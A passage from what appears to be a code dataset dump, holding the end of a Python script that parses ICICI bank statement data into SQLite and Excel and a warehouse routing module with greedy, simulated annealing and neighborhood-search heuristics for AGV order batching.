4: 'Narration', 3:'Chq', 2:'ValueDt', 5:'WithDrawalAmt', 6:'DepositAmt', 7:'ClosingBalance'}, inplace=True)\n\n\n# In[105]:\n\n\ntotal_state.head()\n\n\n# In[106]:\n\n\n# Drop the first 4 records\ntotal_state = total_state.drop(total_state.index[0:4])\n\n\n# In[116]:\n\n\n# drop record if Narration filed is null\ntotal_state=total_state.dropna(subset=['Narration'])\n\n\n# In[117]:\n\n\ntotal_state.reset_index(inplace = True,drop = True)\n\n\n# In[118]:\n\n\nmyIndex = 0\nfor index, row in total_state.iterrows():\n x = row.Date\n \n if pd.notnull(x):\n myIndex = index \n print(\"reset\",myIndex)\n else:\n print(\"Index -\", index ) \n \n # Append Previous record of Narration + current Narration\n narMsg= total_state[myIndex:myIndex+1]['Narration'] + row.Narration\n \n # Update Previous Record\n total_state[myIndex:myIndex+1]['Narration'] = narMsg\n \n print(narMsg)\n\n\n# In[114]:\n\n\ntotal_state.head()\n\n\n# In[119]:\n\n\n# drop record if date filed is null\ntotal_state=total_state.dropna(subset=['Date'])\n\n\n# In[123]:\n\n\ntotal_state.reset_index(inplace = True,drop = True)\n\n\n# In[124]:\n\n\ntotal_state\n\n\n# In[131]:\n\n\ntotal_state.to_csv('total_state_ICICI.csv',index = False, header=True)\n\n\n# In[132]:\n\n\ndf=pd.read_csv('total_state_ICICI.csv')\n\n\n# In[135]:\n\n\ndf\n\n\n# ### Connect to database\n\n# In[31]:\n\n\nimport sqlite3\n\n\n# In[40]:\n\n\nconn=sqlite3.connect('Bank_Statement.db') #Database name is \"Bank_Statement.db\"\n\n\n# In[41]:\n\n\nc=conn.cursor()\n\n\n# In[42]:\n\n\nc.execute('''CREATE TABLE bank_stt (Date date, Narration varchar2, Chq varchar2, ValueDt date, \n WithDrawalAmt float, DepositAmt float, ClosingBalance float)''')\nconn.commit()\n\n\n# In[43]:\n\n\ndf.to_sql('bank_stt', conn, if_exists='replace', index = False)\n\n\n# In[45]:\n\n\nc.execute(''' \nSELECT * FROM bank_stt\n ''')\n\n\n# In[46]:\n\n\nfor row in c.fetchall():\n print(row)\n\n\n# ### Working With Excel\n\n# In[111]:\n\n\nimport openpyxl\n\n\n# In[51]:\n\n\n# Give the location of the file\n#path = \"C:\\\\Users\\\\Itishree\\\\Downloads\\\\ICICI_Stmt.xlsx\"\n\n\n# In[112]:\n\n\n#workbook = openpyxl.load_workbook(path)\nworkbook = openpyxl.load_workbook('ICICI_Stmt.xlsx')\n\n\n# In[115]:\n\n\nworksheet = workbook.active\n\n\n# In[136]:\n\n\nTotal_Credit=df['DepositAmt'].sum()\nprint(Total_Credit)\n\n\n# In[117]:\n\n\nworksheet['D3']=Total_Credit\n\n\n# In[138]:\n\n\nBalance=df.iloc[-1][-1]\nprint(Balance)\n\n\n# In[124]:\n\n\nworksheet['C3']=Balance\n\n\n# In[137]:\n\n\n#df['ClosingBalance'].sum() / df.index.size\nAvg_Bal_6months=df['ClosingBalance'].mean()\nprint(Avg_Bal_6months)\n\n\n# In[145]:\n\n\nworksheet['B11']=Avg_Bal_6months\n\n\n# In[146]:\n\n\nworkbook.save('ICICI_Stmt.xlsx')\n\n\n# In[171]:\n\n\ndf.dtypes\n\n\n# In[169]:\n\n\n#df['Date']=df['Date'].astype('date')\ndf['Date']= pd.to_datetime(df['Date'])\n\n\n# In[170]:\n\n\ndf.head()\n\n","repo_name":"Itishree211/Bank_Statement_Analysis","sub_path":"ICICI_Bank_statement_PDF.py","file_name":"ICICI_Bank_statement_PDF.py","file_ext":"py","file_size_in_byte":3549,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"20734376552","text":"\"\"\"\nThis script implements heuristics for the AGV assisted warehouse routing problem under the assumption of a MIXED\nstorage policy\n\"\"\"\n\n# example to use\nimport numpy as np\nimport pickle\nimport math\nimport time\nfrom operator import itemgetter\nfrom utils import *\nimport copy\nimport random\nimport heapq\nfrom operator import attrgetter\ntry:\n from Queue import LifoQueue\nexcept ImportError:\n from queue import LifoQueue\nfrom collections import Counter\nimport pandas as pd\nimport itertools\n\nfrom prepare_data import Demo\n\n\nclass GreedyMixedShelves(Demo):\n \"\"\"\n This class implements a greedy heuristic for the AGV assisted warehouse routing problem under the assumption of\n a MIXED storage policy. This class inherits from Demo class to access the functions and attributes defined\n there\n \"\"\"\n\n def __init__(self, input_files):\n super(GreedyMixedShelves, self).__init__(*input_files)\n self.item_id_pod_id_dict = defaultdict(dict)\n self.solution = None\n self.orders_of_batches = dict()\n self.batches = dict()\n self.fill_item_id_pod_id_dict()\n self.fill_station_id_bot_id_dict()\n self.warehouseInstance.Orders = {\n str(key): value for key, value in enumerate(self.warehouseInstance.Orders)\n }\n # exclude too big orders\n self.warehouseInstance.Orders = {\n key: value\n for key, value in self.warehouseInstance.Orders.items()\n if self.get_total_weight_by_order(key) <= 18\n }\n self.item_id_pod_id_dict_orig = copy.deepcopy(\n self.item_id_pod_id_dict\n ) # save copies of shelves in order to rollback and test the solution\n self.total_weight = sum(\n [\n self.get_total_weight_by_order(order)\n for order in self.warehouseInstance.Orders.keys()\n ]\n )\n\n def tests(self):\n assert all(\n [\n batch_i.items[item] is batch_i.orders[item.split(\"_\")[0]].items[item]\n for batch_i in self.batches.values()\n for item in batch_i.items.keys()\n ]\n )\n assert all(\n [\n all([x in batch.route for x in batch.items_of_shelves.keys()])\n for batch in self.batches.values()\n ]\n )\n assert all([len(batch.route) > 0 for batch in self.batches.values()])\n assert all([\n abs(len(self.get_batches_for_station(ps1)) - len(self.get_batches_for_station(ps2))) < 2\n for ps1, ps2 in list(itertools.combinations(self.warehouseInstance.OutputStations.keys(), 2))\n ])\n assert set(self.warehouseInstance.Orders.keys()).symmetric_difference(set([x for batch in self.batches.values() for x in batch.orders])) == set()\n # test whether the stock is correct\n item_id_pod_id_dict_orig_copy = copy.deepcopy(self.item_id_pod_id_dict_orig)\n for batch in self.batches.values():\n for item in batch.items.values():\n item_id_pod_id_dict_orig_copy[item.orig_ID][item.shelf] -= 1\n try:\n assert item_id_pod_id_dict_orig_copy == self.item_id_pod_id_dict\n except AssertionError as e:\n for ik, item in self.item_id_pod_id_dict.items():\n for sk, shelf in item.items():\n if shelf != item_id_pod_id_dict_orig_copy[ik][sk]:\n print(ik, sk)\n raise e\n\n assert all([stock >= 0 for item in self.item_id_pod_id_dict.values() for stock in item.values()])\n\n def get_station_with_min_total_distance(self, order_idx):\n \"\"\"\n function to retrieve the station which minimizes the total distance of the items of the\n specified order. The distance of an item to a packing station is measured by the minimum distance shelf storing\n that item\n :param order_idx: index or the order\n \"\"\"\n items = self.get_items_plus_quant_by_order(\n order_idx\n ) # todo refactor with get_items_by_order function\n order_pack_dists = dict()\n for pack_station in list(self.warehouseInstance.OutputStations.keys()):\n item_dists = []\n for item_id, item_quant in items.items():\n shelves_with_item = list(self.item_id_pod_id_dict[item_id].keys())\n shelf_distances = {}\n for shelf in shelves_with_item:\n shelf_distances[shelf] = self.distance_ij[pack_station, shelf]\n item_dists.extend([min(shelf_distances.values())] * item_quant)\n order_pack_dists[pack_station] = np.sum(item_dists)\n ordered_list = sorted(\n order_pack_dists.items(), key=lambda item: item[1], reverse=False\n )\n savings = [\n ordered_list[i + 1][1] - ordered_list[i][1]\n for i in range(len(ordered_list) - 1)\n ] + [-float(\"inf\")]\n return {k[0]: savings[i] for i, k in enumerate(ordered_list)}\n\n def do_station_assignment(self, order):\n station_dict = self.get_station_with_min_total_distance(order)\n num_ps = len(self.warehouseInstance.OutputStations)\n station_dict_copy = station_dict.copy()\n while True:\n try:\n best_station = next(iter(station_dict))\n except StopIteration:\n best_station = next(iter(station_dict_copy))\n return best_station\n weight_of_station = sum(\n [\n self.get_total_weight_by_order(order)\n for order in self.get_orders_assigned_to_station(best_station)\n ]\n )\n if not np.ceil(\n (weight_of_station + self.get_total_weight_by_order(order))\n / self.batch_weight\n ) > np.ceil(np.ceil(self.total_weight / self.batch_weight) / num_ps):\n return best_station\n else:\n station_dict.pop(best_station)\n\n def assign_orders_to_stations(self):\n \"\"\"\n assigns an order to a given station according to the minimum total distance. May lead to unbalanced\n assignments, e.g. that all orders are assigned to only one station.\n :return:\n \"\"\"\n\n def do_assignment(order_dists, orders_of_stations=None, weight_of_station=None):\n\n orders_of_stations = (\n defaultdict(list) if not orders_of_stations else orders_of_stations\n )\n weight_of_station = (\n defaultdict(int) if not weight_of_station else weight_of_station\n )\n num_ps = len(self.warehouseInstance.OutputStations)\n\n order_dists = {\n k: v\n for k, v in sorted(\n order_dists.items(),\n key=lambda item: list(item[1].values())[0],\n reverse=True,\n )\n }\n\n dict_copy = order_dists.copy()\n for order, distances in order_dists.items():\n for station in distances.keys():\n if not np.ceil(\n (\n weight_of_station[station]\n + self.get_total_weight_by_order(order)\n )\n / self.batch_weight\n ) > np.ceil(\n np.ceil(self.total_weight / self.batch_weight) / num_ps\n ):\n orders_of_stations[station].append(order)\n weight_of_station[station] += self.get_total_weight_by_order(\n order\n )\n dict_copy.pop(order)\n break\n elif (\n len(dict_copy[order]) == 1\n ): # fits in no ps under optimal assumptions\n lighter_station = min(\n weight_of_station.keys(),\n key=(lambda k: weight_of_station[k]),\n )\n orders_of_stations[lighter_station].append(order)\n weight_of_station[\n lighter_station\n ] += self.get_total_weight_by_order(order)\n dict_copy.pop(order)\n break\n else:\n dict_copy[order].pop(station)\n orders_of_stations = do_assignment(\n dict_copy, orders_of_stations, weight_of_station\n )\n return orders_of_stations\n return orders_of_stations\n\n order_dists = {\n order: self.get_station_with_min_total_distance(order)\n for order in self.warehouseInstance.Orders.keys()\n }\n\n orders_of_stations = do_assignment(order_dists)\n\n return orders_of_stations\n\n def greedy_next_order_to_batch(\n self, batch: BatchNew, already_assigned, orders_of_station, forbidden=None\n ):\n \"\"\"\n determines which order out of the not assigned orders will be assigned to a given batch. The order which\n minimizes the minimum distance of all items of the order to any item in the batch is chosen.\n Again, we define as distance the distance of the shelf minimizing the distance to an item. The reasoning here\n is, that a order which is stored close to some item that is already in the batch will not add much distance to\n the tour itself.\n :param batch:\n :param already_assigned: list of orders which are already assigned to batches\n :param orders_of_station: list of orders that are assigned to the packing station of the batch\n :param forbidden: orders which have investigated already but would add to much weight to the batch\n :return:\n \"\"\"\n if forbidden is None:\n forbidden = []\n other_orders_of_station = np.setdiff1d(\n orders_of_station, already_assigned + forbidden\n )\n print(\n \"other unassigned orders in the same station ({}) as this batch: \".format(\n batch.pack_station\n ),\n other_orders_of_station,\n )\n sum_min_dist_to_item = dict()\n for order in other_orders_of_station:\n min_distances = []\n for item_in_batch_id, item_in_batch in batch.items.items():\n dist_per_item_to_curr_item = []\n for item in self.get_items_by_order(order):\n min_dist_shelf = min(\n [\n self.distance_ij[item_in_batch.shelf, shelf]\n for shelf in list(self.item_id_pod_id_dict[item].keys())\n ]\n )\n dist_per_item_to_curr_item.append(min_dist_shelf)\n min_distances.append(min(dist_per_item_to_curr_item))\n\n sum_min_dist_to_item[order] = np.sum(\n min_distances\n ) # average instead? otherwise we always pick small orders\n\n return min(sum_min_dist_to_item.keys(), key=(lambda k: sum_min_dist_to_item[k]))\n\n def replenish_shelves(self, batch: BatchNew):\n \"\"\"\n if a batch is destroyed, the items that were taken from the shelves during the tour need to be added to the\n shelves again.\n :param batch:\n :return:\n \"\"\"\n for item_id, item in batch.items.items():\n if item.shelf:\n self.item_id_pod_id_dict[item.orig_ID][item.shelf] += 1\n else:\n pass # SKU not scheduled yet, thus no item has been taken from the shelves\n\n def calc_increase_dist(self, route, shelf, i, pack_station):\n \"\"\"\n given a route, this function calculates for a given shelf and a given position at which the shelf is inserted\n in the route how much distance this shelf would add to the tour.\n :param route: current rout\n :param shelf: new node / shelf\n :param i: position to insert the new node at\n :param pack_station: pack station of the batch\n :return:\n \"\"\"\n if len(route) == 0:\n return (\n self.distance_ij[pack_station, shelf]\n + self.distance_ij[shelf, pack_station]\n )\n # we favor solutions where the same shelve is visited all at once and not at different parts of the route,\n # thus give it a negative penalty here\n try:\n if route[i] == shelf:\n return -0.1\n except IndexError:\n if route[i - 1] == shelf:\n return -0.1\n # if the shelf at the current position of the tour is not equal to the candidate shelf, the distance added to\n # the tour by candidate shelf j at position i is calculated as follows: d_{i-1, j} + d{j, i} - d{i-1, i}\n # (pack stations are added manually as they are not \"part\" of route object)\n if i == 0:\n add_dist = (\n self.distance_ij[pack_station, shelf]\n + self.distance_ij[shelf, route[i]]\n )\n subtr_dist = self.distance_ij[pack_station, route[i]]\n elif i == len(route):\n add_dist = (\n self.distance_ij[route[-1], shelf]\n + self.distance_ij[shelf, pack_station]\n )\n subtr_dist = self.distance_ij[route[-1], pack_station]\n else:\n add_dist = (\n self.distance_ij[route[i - 1], shelf]\n + self.distance_ij[shelf, route[i]]\n )\n subtr_dist = self.distance_ij[route[i - 1], route[i]]\n return add_dist - subtr_dist\n\n def greedy_cobot_tour(self, batch: BatchNew, items=None):\n \"\"\"\n function to determine a (initial) route in a greedy manner. This is done by looking for the shelf / position\n combination of each item to be inserted in the tour that minimizes the distance and add those shelfes at\n the corresponding positions until all items are included in the tour\n :param batch:\n :param items:\n :return:\n \"\"\"\n if not items:\n items = batch.items # copy.deepcopy(batch.items)\n batch.route = (\n []\n ) # if all items of a batch shall be scheduled, the current tour needs to be discarded\n self.replenish_shelves(batch) # replenish shelves\n else:\n items = items # copy.deepcopy(items)\n\n for item in items.values(): # iterate over all items in the batch\n batch_copy = copy.deepcopy(\n batch\n ) # make a copy to not change the current batch if not intended\n shelf_add_distances = {}\n for shelf in item.shelves:\n if (\n self.item_id_pod_id_dict[item.orig_ID][shelf] > -1000\n ): # can only take item if available at that shelf\n # look for each position of the tour how much distance the new shelf would add\n added_dists = {\n i: self.calc_increase_dist(\n batch_copy.route, shelf, i, batch_copy.pack_station\n )\n for i in range(len(batch.route) + 1)\n }\n # determine the position at which the shelf adds the lowest distance\n min_pos, min_pos_dist = min(added_dists.items(), key=itemgetter(1))\n shelf_add_distances[shelf, min_pos] = min_pos_dist\n else:\n pass\n # print(\"Shelf {} has not more units of item {}.\".format(shelf, item.orig_ID))\n\n # retrieve the shelf for which the item adds the lowest possible distance to the current tour\n min_shelf, min_pos = min(shelf_add_distances, key=shelf_add_distances.get)\n # insert the shelf at the corresponding position\n batch.route_insert(min_pos, min_shelf, item)\n item.shelf = min_shelf\n assert item is batch.items[item.ID]\n # remove one unit of the item from the shelf\n self.item_id_pod_id_dict[item.orig_ID][min_shelf] -= 1\n\n def get_new_batch_id(self):\n \"\"\"after destroying a batch, new IDs have to be given to new batches. This function looks, if IDs are\n available within a sequence of numbers, or otherwise adds one to the highest ID number\"\"\"\n if not self.batches:\n return 0\n curr_batch_ids = [int(batch.ID) for batch in self.batches.values()]\n sequence = np.arange(0, max(curr_batch_ids) + 1, 1)\n gaps = np.setdiff1d(sequence, curr_batch_ids)\n if len(gaps) == 0:\n return max(curr_batch_ids) + 1\n else:\n return min(gaps)\n\n def assign_orders_to_batches_greedy(self, pack_station):\n \"\"\"\n function to assign all orders of a given packing station. Goes on until all orders are assigned to a batch.\n For a given batch, orders are assigned to it until no order can be assigned to it without violating the\n capacity restriction. To assign an order to a given batch the function defined above is used\n :param pack_station: ID of the pack station\n :return:\n \"\"\"\n orders_of_station = self.assign_orders_to_stations()[pack_station]\n already_assigned = list()\n while len(already_assigned) != len(orders_of_station):\n batch_id = str(self.get_new_batch_id())\n batch = BatchNew(\n batch_id, pack_station, self.station_id_bot_id_dict[pack_station]\n )\n print(\"initialized new batch with ID: \", batch.ID)\n # initialize the batch with a random order\n init_order = np.random.choice(\n np.setdiff1d(orders_of_station, already_assigned)\n )\n items_of_order = self.get_items_by_order(init_order)\n weight_of_order = self.get_total_weight_by_order(init_order)\n init_order = OrderOfBatch(\n init_order,\n items_of_order,\n weight_of_order,\n self.item_id_pod_id_dict,\n batch.ID,\n )\n batch.add_order(init_order)\n self.greedy_cobot_tour(batch)\n already_assigned.append(init_order.ID)\n forbidden_for_batch = []\n while batch.weight < self.batch_weight and not len(\n np.union1d(already_assigned, forbidden_for_batch)\n ) == len(orders_of_station):\n new_order = self.greedy_next_order_to_batch(\n batch, already_assigned, orders_of_station, forbidden_for_batch\n )\n weight_of_order = self.get_total_weight_by_order(new_order)\n print(\"Chosen order: \", new_order)\n if (batch.weight + weight_of_order) <= self.batch_weight:\n print(\"and it also fits in the current batch ({})\".format(batch_id))\n already_assigned.append(new_order)\n items_of_order = self.get_items_by_order(new_order)\n weight_of_order = self.get_total_weight_by_order(new_order)\n new_order = OrderOfBatch(\n new_order,\n items_of_order,\n weight_of_order,\n self.item_id_pod_id_dict,\n batch.ID,\n )\n batch.add_order(new_order)\n self.greedy_cobot_tour(batch, items=new_order.items)\n else:\n print(\n \"but it would add too much weight to the batch, go on to next...\"\n )\n forbidden_for_batch.append(new_order)\n print(\n \"the current batch ({}) looks as follows: {}\".format(\n batch.ID, batch.orders\n )\n )\n self.batches[batch_id] = batch\n\n def apply_greedy_heuristic(self):\n \"\"\"\n applies the functions defined above to determine a greedy solution to the problem\n \"\"\"\n if self.batches:\n self.batches = dict()\n for pack_station in self.warehouseInstance.OutputStations.keys():\n self.assign_orders_to_batches_greedy(pack_station)\n\n\nclass SimulatedAnnealingMixed(GreedyMixedShelves):\n def __init__(self, input_files):\n super(SimulatedAnnealingMixed, self).__init__(input_files)\n self.apply_greedy_heuristic()\n\n def accept(self, curr_fitness: BatchNew, candidate_batch: BatchNew, T):\n \"\"\"\n determines whether a candidate solution is to be accepted or not\n :param curr_batch: batch from current solution which is to be improved\n :param candidate_batch: batch from candidate solution\n :param T: current temperature\n :return: Accept->bool; improvement->bool\n \"\"\"\n candidate_fitness = self.get_fitness_of_tour(\n candidate_batch.route, candidate_batch.pack_station\n )\n if candidate_fitness < curr_fitness:\n return True, True\n else:\n if self.acceptWithProbability(\n candidate_fitness, curr_fitness, T\n ):\n return True, False\n else:\n return False, False\n\n def acceptWithProbability(self, candidateFitness, currentFitness, T):\n # Accept the new tour for all cases where fitness of candidate => fitness current with a probability\n return np.random.random() <= np.exp(-abs(candidateFitness - currentFitness) / T)\n\n def two_opt(self, batch: BatchNew, curr_fitness, T):\n \"\"\"\n implements the two opt heuristic. The algorithm iterates over every pair of edges of the tour and interchanges\n them.\n :param batch: the batch of the neighborhood solution\n :param currentSolution: the current solution to be improved\n :param T: current temperature\n \"\"\"\n curr_tour = batch.route[:]\n curr_tour.insert(0, batch.pack_station)\n for i in range(len(curr_tour) - 2):\n for j in range(i + 2, len(curr_tour)):\n tour = batch.route\n tour.insert(0, batch.pack_station)\n tour[i + 1] = tour[j]\n reverse_order = [curr_tour[m] for m in reversed(range(i + 1, j))]\n tour[i + 2 : j + 1] = reverse_order\n tour.remove(batch.pack_station)\n accept, improve = self.accept(\n curr_fitness=curr_fitness, candidate_batch=batch, T=T\n )\n if accept:\n return accept, improve\n else:\n old_tour = curr_tour[:]\n old_tour.remove(batch.pack_station)\n batch.route = old_tour\n continue\n return False, False\n\n def two_opt_randomized(self, batch: BatchNew, curr_fitness, T):\n \"\"\"\n randomized version of two-opt in order to speed the local search up. Randomly selects to edges\n \"\"\"\n curr_tour = batch.route[:]\n tour = batch.route\n length = range(len(tour))\n i, j = random.sample(length, 2)\n tour[i], tour[j] = tour[j], tour[i]\n reverse_order = [tour[m] for m in reversed(range(i + 1, j))]\n tour[i + 1 : j] = reverse_order\n accept, improve = self.accept(\n curr_fitness=curr_fitness, candidate_batch=batch, T=T\n )\n if accept:\n return accept, improve\n else:\n batch.route = curr_tour\n return False, False\n\n def swap(self, batch: BatchNew, curr_fitness, T):\n curr_tour = batch.route[:]\n pairs = list(itertools.combinations(range(len(curr_tour)), 2))\n pairs = np.random.permutation(pairs)\n for idx1, idx2 in pairs:\n # idx1, idx2 = np.random.choice(range(len(curr_tour)), 2, replace=False)\n batch.route[idx1], batch.route[idx2] = batch.route[idx2], batch.route[idx1]\n accept, improve = self.accept(\n curr_fitness=curr_fitness, candidate_batch=batch, T=T\n )\n if accept:\n return accept, improve\n else:\n batch.route = curr_tour[:]\n continue\n return False, False\n\n def relocate(self, batch: BatchNew, curr_fitness, T):\n curr_tour = batch.route[:]\n for idx1 in range(len(curr_tour)):\n for idx2 in set(range(len(curr_tour))).difference([1]):\n batch.route.insert(idx2, batch.route.pop(idx1))\n accept, improve = self.accept(\n curr_fitness=curr_fitness, candidate_batch=batch, T=T\n )\n if accept:\n return accept, improve\n else:\n batch.route = curr_tour[:]\n continue\n return False, False\n\n def switch_stations(self, batch: BatchNew):\n \"\"\"\n vary the pack station of batches\n :return:\n \"\"\"\n curr_ps = batch.pack_station\n new_ps = np.random.choice(\n np.setdiff1d(list(self.warehouseInstance.OutputStations.keys()), curr_ps)\n )\n return new_ps\n\n def get_weight_update(self, accepted, improved, best_fitness):\n omega1, omega2, omega3, omega4 = 5, 3, 0, 0\n if self.get_fitness_of_solution() < best_fitness:\n return omega1\n elif improved:\n return omega2\n elif accepted:\n return omega3\n else:\n return omega4\n\n def simulatedAnnealing(\n self,\n alpha=0.95,\n maxIteration=1000,\n minTemperature=0.1,\n max_it_without_improvement=4,\n batch: BatchNew = None,\n lambda_param=0.75,\n init_weights=1,\n ):\n \"\"\"\n implements a simulated annealing to optimize the tour of a given batch or all batches at once. Neighborhood\n solutions are generated using two opt, either randomized or full.\n :param alpha: cooling parameter\n :param maxIteration: maximum iterations\n :param minTemperature: temperature at which to terminate the algorithm if reached\n :param max_it_without_improvement: maximum number of iterations allowed without changes in the solution\n :param batch: if only a single batch shall be optimized, specify it here\n :param lambda_param: weight for previous operator weight in update step\n :param init_weights: initial weights of all operators\n \"\"\"\n\n batches = self.batches.values() if not batch else [batch]\n operations = [self.two_opt, self.swap, self.relocate]\n\n weights = [init_weights] * len(operations)\n\n for batch in batches:\n\n best_batch = copy.deepcopy(batch)\n best_fit = self.get_fitness_of_batch(best_batch)\n curr_fit = self.get_fitness_of_batch(batch)\n\n iteration = 0\n it_without_improvement = 0\n\n T = max(self.distance_ij.values()) - min(list(self.distance_ij.values()))\n while (\n T >= minTemperature\n and iteration < maxIteration\n and it_without_improvement < max_it_without_improvement\n ):\n probs = [x / sum(weights) for x in weights]\n operation = np.random.choice(operations, p=probs)\n if len(batch.route) > 2:\n # improved = self.two_opt_randomized(batch, curr_sol, T)\n accepted, improved = operation(batch, curr_fit, T)\n weight_update = self.get_weight_update(accepted, improved, best_fit)\n weights[operations.index(operation)] = (\n lambda_param * weights[operations.index(operation)]\n + (1 - lambda_param) * weight_update\n )\n if accepted:\n curr_fit = self.get_fitness_of_batch(batch)\n if curr_fit < best_fit:\n best_fit = curr_fit\n best_batch = copy.deepcopy(batch)\n it_without_improvement += 1 if not improved else 0\n T *= alpha\n iteration += 1\n else:\n T = 0 # route cannot be optimized as it consist of only one point\n batch.__dict__ = best_batch.__dict__.copy()\n\n\nclass VariableNeighborhoodSearch(SimulatedAnnealingMixed):\n @staticmethod\n def kk(\n number_list,\n ): # Karmarkar-Karp heuristic, adopted and adapted from partition package\n pairs = LifoQueue()\n group1, group2 = [], []\n heap = [(-1 * i.weight, i.ID) for i in number_list]\n heapq.heapify(heap)\n while len(heap) > 1:\n i, labeli = heapq.heappop(heap)\n j, labelj = heapq.heappop(heap)\n pairs.put((labeli, labelj))\n heapq.heappush(heap, (i - j, labeli))\n group1.append(heapq.heappop(heap)[1])\n\n while not pairs.empty():\n pair = pairs.get()\n if pair[0] in group1:\n group2.append(pair[1])\n elif pair[0] in group2:\n group1.append(pair[1])\n return group1, group2\n\n def __init__(self, input_files):\n super(VariableNeighborhoodSearch, self).__init__(input_files)\n self.simulatedAnnealing() # get initial solution\n\n def update_batches_from_new_order(self, new_order, batch_id):\n \"\"\"\n does all the necessary updating when a order is added to a batch. This includes optimizing the tour through\n greedy and simulated annealing heuristics\n :param new_order:\n :param batch_id:\n :return:\n \"\"\"\n update_batch = self.batches[batch_id]\n items_of_order = self.get_items_by_order(new_order)\n weight_of_order = self.get_total_weight_by_order(new_order)\n new_order = OrderOfBatch(\n new_order,\n items_of_order,\n weight_of_order,\n self.item_id_pod_id_dict,\n update_batch.ID,\n )\n update_batch.add_order(new_order)\n self.greedy_cobot_tour(update_batch, new_order.items)\n # self.simulatedAnnealing(batch=self.batches[batch_id]) # takes too much time --> perform only at the end\n\n def shake(self, k):\n batches_to_destroy = k if k <= len(self.batches) else len(self.batches)\n print(f\"Performing perturbation with k={k}\")\n orders = {}\n for i in range(batches_to_destroy):\n destroy_batch = self.choose_batch_for_destruction()\n orders = {**orders, **self.batches[destroy_batch].orders}\n self.replenish_shelves(self.batches[destroy_batch])\n self.batches.pop(destroy_batch)\n\n weight_dict = self.get_weight_per_batch()\n # sort orders with respect to their weight in descending order (try to assign the biggest orders first)\n weight_of_orders = {\n key: v.weight\n for key, v in sorted(\n orders.items(), key=lambda item: item[1].weight, reverse=True\n )\n }\n for order, weight_of_order in weight_of_orders.items():\n candidate_batches = {}\n for key, weight in weight_dict.items():\n if weight_of_order + weight <= self.batch_weight:\n candidate_batches[key] = weight_of_order + weight\n if not candidate_batches:\n pack_station = self.do_station_assignment(order)\n batch_id = str(self.get_new_batch_id())\n self.batches[batch_id] = BatchNew(\n batch_id, pack_station, self.station_id_bot_id_dict[pack_station]\n )\n self.update_batches_from_new_order(order, batch_id)\n else:\n # choose the batch with maximum workload after assignment\n new_batch_of_order = np.random.choice(list(candidate_batches.keys()))\n # new_batch_of_order = max(candidate_batches.keys(), key=(lambda k: candidate_batches[k]))\n self.update_batches_from_new_order(\n new_order=order, batch_id=new_batch_of_order\n )\n # update weight_dict\n weight_dict = self.get_weight_per_batch()\n self.align_station_utilization()\n print(\"fitness after perturbation: \", self.get_fitness_of_solution())\n\n def align_station_utilization(self):\n \"\"\"function to change the pack station assigned to batches as long as the\n utilization at the pack stations is aligned\n \"\"\"\n while any([\n abs(len(self.get_batches_for_station(ps1)) - len(self.get_batches_for_station(ps2))) >= 2\n for ps1, ps2 in list(itertools.combinations(self.warehouseInstance.OutputStations.keys(), 2))\n ]):\n self.swap_ps_of_batch()\n\n def exchange_orders(self, k, processed):\n card = k\n\n all_orders = {\n order.ID: order for batch in self.batches.values() for order in list(batch.orders.values())\n }\n\n combs = list(itertools.combinations(\n [order.ID for order in all_orders.values()], 2\n ))\n combs_feas = []\n for comb in combs:\n order_i, order_j = itemgetter(*comb)(all_orders)\n # exclude combinations that come from same batch -> exchanging orders within a batch makes no sense\n if order_i.batch_id == order_j.batch_id:\n continue\n # check weight constraints\n weight_diff = order_i.weight - order_j.weight\n if (\n weight_diff <= 0 and abs(weight_diff) <= self.batch_weight - self.batches[order_i.batch_id].weight\n ) or (weight_diff > 0 and weight_diff <= self.batch_weight - self.batches[order_j.batch_id].weight):\n combs_feas.append(comb)\n\n count = 0\n while count < card:\n # refresh so the order objects are bound to the one assigned to the batches (weird behavior in python)\n all_orders = {\n order.ID: order for batch in self.batches.values() for order in list(batch.orders.values())\n }\n\n combs = list(set(combs).difference(processed))\n if len(combs) == 0:\n return processed\n\n order_weights = {\n order.ID: sum(\n [\n (\n len(self.batches[order.batch_id].items_of_shelves[key]) -\n order.chosen_shelves.get(key, 0)\n ) == 0\n for key in self.batches[order.batch_id].items_of_shelves.keys()\n ]\n )\n for order in all_orders.values()\n }\n\n comb_weights = [sum(itemgetter(*combs[i])(order_weights)) for i in range(len(combs))]\n\n if sum(comb_weights) == 0:\n probs = [1 / len(combs)] * len(combs)\n else:\n probs = np.array(comb_weights) / sum(comb_weights)\n\n orders = combs.pop(np.random.choice(range(len(combs)), p=probs))\n order_i, order_j = itemgetter(*orders)(all_orders)\n\n # somehow have to do that, otherwise objects diverge leading to complex problems\n order_i = self.batches[order_i.batch_id].orders[order_i.ID]\n order_j = self.batches[order_j.batch_id].orders[order_j.ID]\n\n # through exchange in previous iterations, this case could occur\n if order_i.batch_id == order_j.batch_id:\n continue\n # do not make the same operation twice\n processed.append(orders)\n # get batches of orders\n batch_i = self.batches[order_i.batch_id]\n batch_j = self.batches[order_j.batch_id]\n # has been checked, but through previous iterations could have changed\n weight_diff = order_i.weight - order_j.weight\n if (\n weight_diff <= 0 and abs(weight_diff) <= self.batch_weight - batch_i.weight\n ) or (weight_diff > 0 and weight_diff <= self.batch_weight - batch_j.weight):\n count += 1\n\n batch_i.del_order(order_i, self.item_id_pod_id_dict)\n batch_j.add_order(order_i)\n self.greedy_cobot_tour(batch_j, items=order_i.items)\n\n batch_j.del_order(order_j, self.item_id_pod_id_dict)\n batch_i.add_order(order_j)\n self.greedy_cobot_tour(batch_i, items=order_j.items)\n\n if len(batch_i.items) == 0:\n self.batches.pop(batch_i.ID)\n batch_i = None\n if len(batch_j.items) == 0:\n self.batches.pop(batch_j.ID)\n batch_j = None\n self.align_station_utilization()\n if batch_i: self.local_search_shelves(batch_i)\n if batch_j: self.local_search_shelves(batch_j)\n return processed\n\n def determine_switchable_orders_randomized(self, k, processed):\n \"\"\"given two batches (batch ids), this function determines one order of each batch which can be\n exchanged between the batches (wrt to capacity restrictions).\n \"\"\"\n batch_i, batch_j = np.random.choice(\n [batch for key, batch in self.batches.items()], 2, replace=False\n )\n\n batch_i_orders = list(batch_i.orders.values())\n batch_j_order = list(batch_j.orders.values())\n\n card = min(k, len(batch_i_orders) + len(batch_j_order))\n\n combs = itertools.combinations(\n [order.ID for order in batch_i_orders + batch_j_order], card\n )\n combs = list(set(combs).difference(processed))\n if len(combs) == 0:\n return processed\n\n batch_i_orders_weights = {\n order.ID: sum(\n [\n (len(batch_i.items_of_shelves[key]) - order.chosen_shelves.get(key, 0)) == 0\n for key in batch_i.items_of_shelves.keys()\n ]\n )\n for order in 